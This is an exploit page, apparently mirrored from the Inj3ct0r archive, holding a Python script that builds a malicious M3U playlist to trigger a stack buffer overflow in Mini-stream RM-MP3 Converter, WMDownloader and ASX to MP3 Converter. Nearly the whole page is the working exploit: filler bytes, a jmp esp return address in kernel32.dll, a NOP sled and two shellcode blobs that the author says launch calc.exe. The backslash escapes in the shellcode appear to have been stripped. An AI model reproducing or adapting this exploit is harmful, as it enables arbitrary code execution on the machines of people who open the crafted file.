Home / os / win7

Mini-stream RM-MP3 Converter/WMDownloader/ASX MP3 Stack Buff

Posted on 02 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mini-stream RM-MP3 Converter/WMDownloader/ASX MP3 Stack Buffer</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================================================
Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter Stack Buffer Overflow Exploit
============================================================================================


####################################################################################
# Exploit Title: Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter Stack Buffer Overflow Exploit
#
# Tested on Windows XP SP3 Pro
# Found By : Cyber-Zone (ABDELKHALEK)
# http://www.securityfocus.com/bid/34494
# The way exploit written is slightly different than above Vulnerability
# Refer: http://downloads.securityfocus.com/vulnerabilities/exploits/34494-2.pl
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#         http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#         http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
# THIS EXPLOIT WORKS FOR ALL THE 3 INSTALLERS ABOVE
# corelanc0d3r: Greetz from INDIA
# My First BoF Exploit
# Author: Praveen Darshanam
# Contact: praveen_recker@sify.com
# Blog: http://darshanams.blogspot.com
#
#This was strictly written for educational purpose. Use it at your own risk.
#Author will not bare responsibility for any damages watsoever.
#
# Vinod, wish u happy journey :) ..... enjoy maadi !!!
####################################################################################
 
handler = &quot;ftp://&quot;
buff1 = &quot;D&quot; * 17418
#eip = &quot;x7DxA5x04x10&quot;
#0x1004A57D  jmp esp   C:Program FilesMini-streamWMDownloaderWDfilter01.dll
#ABOVE ADDRESSES DIDN'T WORK FOR ME
eip = &quot;x7bx46x86x7c&quot;     # 0x7C86467B      jmp esp   kernel32.dll
 
# both SHELLCODES pops calc.exe
code2exec = (&quot;xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaax3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6bxf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7axcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05x7fxe8x7bxca&quot;)
&quot;&quot;&quot;
code2exec = (&quot;x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exffxd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9dx7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3cxb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xedx72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66xf3x07&quot;)
&quot;&quot;&quot;
noop = &quot;x90&quot; * 10
# 4 bytes is enough to make ESP point to SHELLCODE
print &quot;code2exec offset is:&quot;,(40000 - len(handler) - len(buff1) - len(eip) - len(noop) - len(code2exec))
 
buff2 = &quot;Z&quot; * (40000 - len(handler) - len(buff1) - len(eip) - len(noop) - len(code2exec))
mal_buff = handler + buff1 + eip + noop + code2exec + buff2
try:
    wmdownloader = open (&quot;wmdownloader_codeexec.m3u&quot;,&quot;w&quot;)
    wmdownloader.write (mal_buff)
    wmdownloader.close()
    print &quot;

[+] Coded by Praveen Darshanam&quot;
    print &quot;[+] Malicious M3U File Successfully created

&quot;
except:
    print &quot;
[+] Unable to create file . . .
&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP